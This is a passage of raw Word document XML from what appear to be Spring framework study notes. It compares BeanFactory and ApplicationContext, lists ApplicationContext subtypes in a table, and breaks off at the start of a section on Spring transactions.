      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: BeanFactory is now considered outdated. It's been replaced with ApplicationContext in most modern applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB3A594" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68"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2. ApplicationContext Container</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E3DF93" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1874"/>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ApplicationContext</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a more feature-rich container compared to BeanFactory. It is the most commonly used container in Spring applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36050F2D" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1874"/>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lastRenderedPageBreak/>
        <w:t xml:space="preserve">It provides all the functionality of BeanFactory, with additional features like </w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>event propagation</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>AOP support</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>internationalization</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (i18n), and more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B240617" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1874"/>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Eager Loading</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Beans in an ApplicationContext are eagerly loaded by default when the context is initialized. This means all beans are created and initialized as soon as the context is loaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300A8AE8" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68"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Key Subtypes of ApplicationContext</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7FA526" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="187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GenericWebApplicationContext</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEF657D" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="187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This is used for web applications with Spring 5+.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41155F93" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="187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It supports the creation of beans for a web-based Spring MVC application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C006B48" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="187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AnnotationConfigApplicationContext</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6720A409" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="187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This container is used for applications configured using </w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java-based configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (i.e., @Configuration annotated classes) instead of XML configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A41E946" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="187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ClassPathXmlApplicationContext</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9F13DE" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="187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This container is used to load an </w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>XML-based configuration file</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and is one of the most common containers when using XML configuration in Spring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACA2C00" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="187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GenericWebApplicationContext</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1906DBB0" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="187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This is used specifically in web applications that use the Servlet 3.0+ container and Spring MVC for web-based development.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3726A0B1" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68"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Difference Between BeanFactory and ApplicationContex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21"/>
        <w:gridCol w:w="3568"/>
        <w:gridCol w:w="4415"/>
      </w:tblGrid>
      <w:tr w:rsidR="00085CB4" w:rsidRPr="00085CB4" w14:paraId="0C0433D4" w14:textId="77777777" w:rsidTr="00F40C68">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FEF7127" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68"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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FD4D09D" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68"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BeanFactory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22540302" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68"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ApplicationContext</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00085CB4" w:rsidRPr="00085CB4" w14:paraId="59828B1B" w14:textId="77777777" w:rsidTr="00F40C68">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1845062A" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68"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Loading Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B0A2AF0" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68"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azy Loading</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="401DFD13" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68"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Eager Loading (by default)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00085CB4" w:rsidRPr="00085CB4" w14:paraId="27E43149" w14:textId="77777777" w:rsidTr="00F40C68">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="001F7669" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68"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Event Propagation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="520E4753" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68"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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08D3294D" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68"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Yes (supports events like ApplicationListener)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00085CB4" w:rsidRPr="00085CB4" w14:paraId="6BBA2684" w14:textId="77777777" w:rsidTr="00F40C68">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78438DD7" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68"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Internationalization (i18n)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52A56684" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68"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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E5AC812" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68"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Yes (supports MessageSource)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00085CB4" w:rsidRPr="00085CB4" w14:paraId="7716DF83" w14:textId="77777777" w:rsidTr="00F40C68">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F6476D5" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68"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AOP Support</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C2FC456" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68"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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F8BF3DB" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68"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Yes (integrates with Spring AOP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00085CB4" w:rsidRPr="00085CB4" w14:paraId="7B9010C3" w14:textId="77777777" w:rsidTr="00F40C68">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4389A551" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68"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Bean Post Processors</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1297F0AA" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68"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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69F8743C" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68"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Yes (allows custom logic before/after bean initialization)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00085CB4" w:rsidRPr="00085CB4" w14:paraId="4A2C91D4" w14:textId="77777777" w:rsidTr="00F40C68">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60E0096A" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68"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Typical Use</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0DD61C06" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68"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Simple applications or resource-constrained environments</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69FDD6F6" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68"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Enterprise applications with complex requirements (AOP, events, etc.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2AE35286" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68"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Key Containers in Spring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE1B6B8" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1876"/>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GenericApplicationContext</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A generic, non-web Spring container for any application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072B9B19" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1876"/>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AnnotationConfigApplicationContext</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For Java-based configuration (@Configuration classes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE9B113" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1876"/>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ClassPathXmlApplicationContext</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For XML-based configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563AF912" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1876"/>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GenericWebApplicationContext</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For web-based applications (Spring MVC).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F721935" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68"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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473DCEC9" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00085CB4" w:rsidRDefault="00F40C68" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1877"/>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BeanFactory</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is suitable for basic, lightweight use cases but lacks many features of the ApplicationContext.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2932C844" w14:textId="77777777" w:rsidR="00F40C68" w:rsidRPr="00CE4B95" w:rsidRDefault="00F40C68" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1877"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ApplicationContext</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the more powerful container used in most Spring applications. It supports advanced features like event handling, AOP, internationalization, and more, making it ideal for enterprise-level applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEBFB24" w14:textId="409238FA" w:rsidR="00AD1E70" w:rsidRPr="00CE4B95"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654717B">
          <v:rect id="_x0000_i2110" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6623B75C" w14:textId="48A4A83C" w:rsidR="00A930F5" w:rsidRPr="00CE4B95" w:rsidRDefault="00C92BC6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="441" w:name="_Toc196307921"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How transactions work in spring</w:t>
      </w:r>
      <w:r w:rsidR="00A930F5" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="441"/>
    </w:p>
    <w:p w14:paraId="29893B82" w14:textId="512F62A6" w:rsidR="00426F8E" w:rsidRPr="00085CB4" w:rsidRDefault="00426F8E" w:rsidP="00085CB4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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In Spring, </w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>transactions</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are an essential part of managing data consistency and ensuring that operations like database updates or other transactional work are completed successfully, or else rolled back if an error occurs. Spring provides an abstraction layer over different transactional mechanisms (e.g., JDBC, JPA, Hibernate, JMS) and manages them efficiently through the use of the </w:t>
      </w:r>
